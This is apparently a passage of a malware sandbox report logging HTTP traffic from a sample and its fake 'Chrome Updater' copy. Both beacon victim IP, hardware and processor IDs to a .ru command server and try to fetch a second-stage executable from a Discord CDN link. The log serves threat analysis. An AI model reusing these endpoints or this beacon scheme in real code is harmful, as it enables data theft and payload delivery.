                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    102192.168.2.649825104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:52 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:52 UTC572INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:52 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hHCLJeRQNumFtf82AVxNNvb4Bgeh2VO4PkQP6RxNqJLEFmNKYHRYXJLP3Ow%2BuRIdfiZT9jNyi2bOnbXKupsxw7sO06h1ZH2uWj6fnwBjnljHUjpxQK26LPYObOlAAq307tqgj2yp"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c755aa13828d-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:52 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    103192.168.2.649826162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:52 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:52 UTC1342INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:52 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c757ce648012-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 14
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:52 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=hN.lvWiGFALKMdStIIybQc67.4KnT4SGA4fmq.oNdrw-1704353452-1-AdRGASoRg84tAtgH+znN86vN3i2pCpqHtLPIFUoDXdkTWlrl+Ug8+055zle3Lyr30jopEZ2S/1jKGrhEB5UJNBg=; path=/; expires=Thu, 04-Jan-24 08:00:52 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AjJqhJ8jQKdUqUFr3%2B9dS255J3r3KrJv1MiSMvXRyhabYThz1CnGnYEVh6J6nv0R3CH%2B0Y3rdt%2F7723ektpAHkNux0ckNoDh5peBOTF6XONjIUxq89bkT%2FUhgGe8IWDo6iniUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=SOxnYV2Vkj0uxgRi1OI04WKzS_GF8T5yPOeLmSITEqo-1704353452793-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:52 UTC27INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e
                                                                                    Data Ascii: <?xml version='1.0' encodin
                                                                                    2024-01-04 07:30:52 UTC209INData Raw: 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: g='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    104192.168.2.649827104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:52 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:53 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:53 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JxuXP%2FuHF0m0z9LMA3K2uzJbZwnfa3lphkeOCuxVhN8XrZ7liimSnsGEadKKPe4ZXkPaAHeMr3Qy9VOt4vQGLvwJeYd2qLRbMSPFo1zj%2BrhUFDbkaFVNytyd%2F%2BSL6OR69OrF6ftk"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c75a0e1b81d9-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:53 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    105192.168.2.649828104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:53 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:53 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:53 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tuXEuZFVMIMtc20MMr8Y8Xz9bAWaIKfxs0%2BonOhW80dpkrow7jlsk25NWFqR695Oz6F2Yn2xxmZ1cUxHpyRfGblljTgRLcIlR%2By5eJ4l8KuODKzjs7pjWsohr1lhg%2B0uQszdrxsQ"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c75b5af16fef-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:53 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    106192.168.2.649829162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:53 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:53 UTC1340INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:53 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c75e488f802a-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 15
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:53 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=v4Wq7RoDW9j1gUFMuX4hIST9cKPaWJVOM2EUaHJwOnc-1704353453-1-Aebc+bP5UZdzL1AJSTMUtBf/EhkLYHB/YpsQ685IFDL4p3B9JcyK5JeAk8nS78YFE/fljoF6CKhLXpdVFZljub8=; path=/; expires=Thu, 04-Jan-24 08:00:53 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jPVXtl0Jk3X7Pf9DnscrjlL%2FdWGR8kfECVSaOmzFGtLuqUJnW4l7%2Fb65pPhxhZqCTjcy2iDwhLgzyQDS4hozdkwBKHoYxb1plmcrvliaWpjyUC4sb6UI%2F9MHBd37ceaqqB7ZGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=ItD9PK.gnitprihoHMi0NEs_93kv4vTiwBDg5_8rg88-1704353453839-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:53 UTC29INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d
                                                                                    Data Ascii: <?xml version='1.0' encoding=
                                                                                    2024-01-04 07:30:53 UTC207INData Raw: 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 'UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    107192.168.2.649830104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:54 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:54 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:54 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NBnU8g70lb6AeYy3pOPNtBBM9Iiuk6O%2FawwSKwZ0ecTHFVJRnjSpNCa92fW48Rl4bz1rBnbwV9lMT9oqm%2Bc7rfinf%2FfqmsWYq5XARPY2H6tfRKy4jpkQ4Ce9%2B91WI7zc1g9R4jPC"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7610cc007bb-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:54 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    108192.168.2.649831104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:54 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:54 UTC582INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:54 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fWM4AfSt38GMQnP7rjF8fvRxqyGjjdbk9%2BH6vA%2B4hWiW%2BoVhYAAjGLsUjeqc2Lb9p%2FwpDfjMJAd2Q8KW79yxt1QtncUzpbpBiM%2FKwF%2Fsb4Bs7ldziZeYVExsfJHnO7MXkVbs4YZH"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c761ecbf0678-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:54 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    109192.168.2.649832104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:54 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:55 UTC605INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:55 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2%2BCbwsRP1PpUC5%2BEVAKDA9aNWdD74rPQmjKLnh58Hg4AAUhhzq7oOucRzgGCjVIpI25lvqjTkpW5i8BcqKHVX%2FJKg1NpY%2BOOUlZM7QeeRe4%2FB%2BaEfHknjvSMPnOhN4ZS72ynDx5v"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c766381b8238-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:55 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    110192.168.2.649833162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:54 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:55 UTC1343INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:55 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c76689933b95-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 39
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:55 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=MeaaVKVlwrdmTSoYoDOhqF3pDtFBJzryBZNmxvZeuto-1704353455-1-AYeLlQY97ZmnHWUhtlC+h11v9pe7jE66GPTltajK3S3fHMW+OMUAQQoo5tCcVggOJhsfBweLB02EXTrBXURG4Z8=; path=/; expires=Thu, 04-Jan-24 08:00:55 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0yKLPhDCLcuL8GbQCvi%2FF2MIyrQ%2B8yCb4B6pLTKIy0WKVRgdF1RZSk0wsTV4cuBNZMiAue3tCw9rcCtgoK%2FfS%2FPabk%2BFUAex%2F6wbxVlJah7eJae8VQZI6LljSYAjx%2F%2BIFoYWag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=npXo4AOR2eFk3CbUAUk3CJiH9WgJzwu4EF_X5Z5XNy0-1704353455145-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:55 UTC26INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69
                                                                                    Data Ascii: <?xml version='1.0' encodi
                                                                                    2024-01-04 07:30:55 UTC210INData Raw: 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ng='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    111192.168.2.649834162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:55 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:55 UTC1334INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:55 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c769bd7b7fe2-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 17
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:55 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=Np23XXOxqYTFs3M5sGHrFmxN9dBU.QijTPf76BHsGv8-1704353455-1-AfpwDrAldrRtOzibDP3/LmP8jZVdpot+VkxJpz3EIqJP8khdu9vpqAruj78FvM0MUET0kb614gL86H24heY0kAo=; path=/; expires=Thu, 04-Jan-24 08:00:55 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bxEjKhpTM24oc5FAm5epdesUhA4AxUrrFCv7wWWfMdSHp0foFhOFSaq25ehzICJ8Ga0TtHMjamZDUePltJ3C9eredBKxesH0pSLpt4Zo27hCyOWpL8y0Mdjlee9qZN80BCm9ow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=aSIZNNwMBfRPwKIRlDVGqsPz4PDsgkiwS0FOv2i56aY-1704353455664-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:55 UTC35INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8
                                                                                    2024-01-04 07:30:55 UTC201INData Raw: 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: '?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    112192.168.2.649835104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:55 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:55 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:55 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fs8YHcJ2ruroRx82iFWzWAU%2F7wt%2BUk7SrcHFaAh7F93z01g0%2BxoIiKhycXltEU7cHOX64dY%2BAVLllgzDrCA8PZv0Hxgnez8BlWRbAcCyX0BTaVvSX7ltVyBEsvzJLK%2BW4FSE7dnr"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c769ff12700f-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:55 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    113192.168.2.649836104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
